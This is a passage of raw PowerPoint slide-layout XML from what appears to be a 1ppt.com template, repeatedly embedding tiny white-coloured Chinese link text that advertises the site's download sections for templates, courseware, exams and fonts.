              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout275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75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75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75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75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75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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout275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75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75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75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7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76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76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76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76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76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76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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout276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76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76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76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7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77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77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77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77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77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77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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
